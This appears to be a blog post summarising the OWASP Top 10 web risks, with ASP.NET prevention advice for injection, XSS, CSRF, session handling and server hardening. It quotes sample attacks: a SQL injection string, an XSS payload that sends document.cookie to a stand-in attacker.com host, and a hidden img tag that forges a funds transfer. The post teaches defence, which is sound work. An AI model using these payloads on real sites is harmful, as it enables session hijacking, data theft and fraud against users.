Just another tech site

Web Application Security


OWASP gives an interesting perspective on the main threads.
this is a summary og the OWASP site please refer to it for the complete details and the original post

OWASP Top 10 thread

A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards

Attack Vectors Security Weakness Detectability Technical Impacts
A1: Injection EASY Prevalence COMMON AVERAGE SEVERE
A2: Cross-Site Scripting (XSS) AVERAGE VERY WIDESPREAD EASY MODERATE
A3: Broken Authentication and Session Management AVERAGE COMMON AVERAGE SEVERE
A4: Insecure Direct Object References EASY COMMON EASY MODERATE
A5: Cross-Site Request Forgery (CSRF) AVERAGE WIDESPREAD EASY MODERATE
A6: Security Misconfiguration EASY COMMON EASY MODERATE
A7: Insecure Cryptographic Storage EASY COMMON DIFFICULT SEVERE
A8: Failure to Restrict URL Access EASY UNCOMMON AVERAGE MODERATE
A9: Insufficient Transport Layer Protection DIFFICULT COMMON EASY MODERATE
A10: Unvalidated Redirects and Forwards EASY UNCOMMON EASY MODERATE

A1: Injection

Example

The application uses untrusted data in the construction of the following vulnerable SQL call:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") +"'";

The attacker modifies the ‘id’ parameter in their browser to send: ‘ or ‘1’=’1. This changes the meaning of the query to return all the records from the accounts database, instead of only the intended customer’s.

http://example.com/app/accountView?id=' or '1'='1

In the worst case, the attacker uses this weakness to invoke special stored procedures in the database, allowing a complete takeover of the database host.

How to Prevent the attack

1.- Use Validation:
Positive or “whitelist” input validation with appropriate canonicalization

2.- Use a safe API
use parameterized queries like SqlCommand() or OleDbCommand() with bind variables.The use of Entity Framework will prevent this type of attacks because is parametrized.
– Avoid LINQ ExecuteQuery
– Avoid EXEC in stored procedures

A2: Cross-Site Scripting (XSS)

Cross-site scripting (XSS) attacks exploit vulnerabilities in Web page validation by injecting client-side script code.

Example Scenarios

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "〈input name='creditcard' type='TEXT‘ value='" + request.getParameter("CC") + "'〉";

The attacker modifies the ‘CC’ parameter in their browser to:

'〉〈script〉document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie〈/script〉'.

This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.

How to Prevent the attack in ASP.NET

Microsoft Best pratices to prevent this attacks is described in [3]
Step 1. Check that ASP.NET request validation is enabled.

<system.web>
  <pages buffer="true" validateRequest="true" />
</system.web>

Step 2. Review ASP.NET code that generates HTML output.

Response.Write
<% =

Step 3. Determine whether HTML output includes input parameters.

Step 4. Review potentially dangerous HTML tags and attributes.
Step 5. Evaluate countermeasures.

Test

through an input field.

<script>alert('hello');</script> 

A3: Broken Authentication and Session Management

Example

Application supports URL rewriting, putting session IDs in the URL:

http://example.com/sale/saleitems;jsessionid=2P0OC2JDPXM0OQSNDLPSKHCJUN2JV?dest=Hawaii

HttpOnly

If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script (again if the browser supports this flag)[5]
In .NET 2.0, HttpOnly can also be set via the HttpCookie object for all custom application cookies
Via web.config in the system.web/httpCookies element

<httpCookies httpOnlyCookies="true" …> 

Or programmatically

C# Code:
HttpCookie myCookie = new HttpCookie("myCookie");
myCookie.HttpOnly = true;
Response.AppendCookie(myCookie);
Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]

ASP.NET SessionID

The session cookie contains the SessionID used to identify the user session. If you want to secure your session, use HTTPS to encrypt the whole HTTP communication via SSL and set the cookies only with the flags
– secure to only allow the cookie to be send via HTTPS and
– HttpOnly to forbid local access via JavaScript.

A4: Insecure Direct Object References

The scenario involves the possible use of a data reference (of extrapolate a new id) in order to have access to a restricted data.

Example:

http://example.com/productDetail.aspx?id=112

The application uses unverified data in a SQL call that is accessing account information. In this case the application will makea query

// 1.  create a command object identifying
//     the stored procedure
SqlCommand cmd  = new SqlCommand("Ten Most Expensive Products", conn);

// 2. set the command object so it knows
//    to execute a stored procedure
cmd.CommandType = CommandType.StoredProcedure;

// 3. add parameter to command, which
//    will be passed to the stored procedure
cmd.Parameters.Add(new SqlParameter("@ProductID", custId));

// execute the command
rdr = cmd.ExecuteReader();

So if the user changes the request in the browser, he could request another product Id.

Prevention:

the line of defence
a.- Avoid presenting “guessable IDs”. for example the use of sequence ids as reference for objects (tipicaly DB id). This will make the guessing of the next reference more complet
b.- secure the data layer. authenticate each access to the data layer.

A5: Cross-Site Request Forgery (CSRF)

Example:
The application allows a user to submit a state changing request that does not include anything secret. Like so:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

So, the attacker constructs a request that will transfer money from the victim’s account to their account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

If the victim visits any of these sites while already authenticated to example.com, any forged requests will include the user’s session info, inadvertently authorizing the request.

HOW TO PREVENT THE ATTACK
Preventing CSRF requires the inclusion of a unpredictable token in the body or URL of each HTTP request. Such tokens should at a minimum be unique per user session, but can also be unique per request.

Use ViewStateUserKey or ValidateAntiForgeryTokenAttribute to add a layer of defense against Cross-Site Request Forgery (XSRF) attacks. All ASP.NET Web Forms that require authentication must set the System.Web.UI.Page.ViewStateUserKey property to a unique value per user (such as the user’s session ID) to help protect the application against cross-site request forgery attacks.[ref 8]

A6: Security Misconfiguration

The list can be very long. basicaly administrator inattention can lead to omitions that will be used by attackers, for example
– The app server admin console is automatically installed and not removed.
– Directory listing is not disabled on your server.
– App server configuration allows stack traces

HOW TO PREVENT THE ATTACK
The principal idea is to minimise the attack surface by leaving the minimum elements on the server. This process is called server hardening. During this process, the administrator will review all server settings and make sure minimum set of feature are installed and the most restrictive permissions are applyed.

Here is a list of some elements you should look at

1.Change the default admin password
2.Verify that ASP.NET Errors Are Not Returned to the Client.
3.Make sure that the mode attribute is set to “remoteOnly” in the web.config file as shown in the following example.
4.IIS configuration: disrectory listing disabled
5.web.config file encrypted.

A7: Insecure Cryptographic Storage

The typical information that is stored in an uncrypted maner. Or the encrypted file stored in the same directory that the key used to encrypt/decrypt it.

HOW TO PREVENT THE ATTACK
1.Ensure all data storages are encrypted.
2.Ensure offsite backups are encrypted, (the keys are managed and backed up separately.)
3.Ensure appropriate strong standard algorithms and strong keys are used

A8: Failure to Restrict URL Access

Example:
Imagine the user has acces to a page and then redirect manually to an admin page.

http://example.com/app/getappInfo
http://example.com/app/admin_getappInfo

If no validation is done after the first validation, the user might have access to the second URL.

HOW TO PREVENT THE ATTACK
The ASP.NET authorization mecanism should be implemented [ref 6]
With URL authorization, you explicitly allow or deny access to a particular directory by user name or role.

  <location path="Order">
    <system.web>
      <authorization>
        <allow roles="MasterAdministrator,Administrator,OrderManager" />
      </authorization>
    </system.web>
  </location>

AUTOCOMPLETE HTML attribute

It is recommended that the AUTOCOMPLETE attribute on all sensitive forms should be disabled using the following code example:

<FORM AUTOCOMPLETE = “off”>
 : 
</FORM>

For further information about AutoComplete, please visit
http://msdn.microsoft.com/en-us/library/ms533032.aspx

Reference

[1] https://www.owasp.org/index.php/Top_10_2010-A1
[2] http://www.articlesbase.com/security-articles/web-20-security-testing-approach-918831.html
[3] http://msdn.microsoft.com/en-us/library/ff649310.aspx (XSS attack prebvention)
[4] http://stackoverflow.com/questions/2840559/is-encrypting-session-id-or-other-authenticate-value-in-cookie-useful-at-all (sessionId)
[5] https://www.owasp.org/index.php/HttpOnly (HttpOnly)
[6] http://msdn.microsoft.com/en-us/library/wce3kxhd(v=VS.100).aspx (.NET authorization)
[7] http://msdn.microsoft.com/en-us/library/b6x6shw7.aspx (.NET authorization location element)
[8] http://msdn.microsoft.com/en-us/library/ms533032.aspx

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Tag Cloud

%d bloggers like this: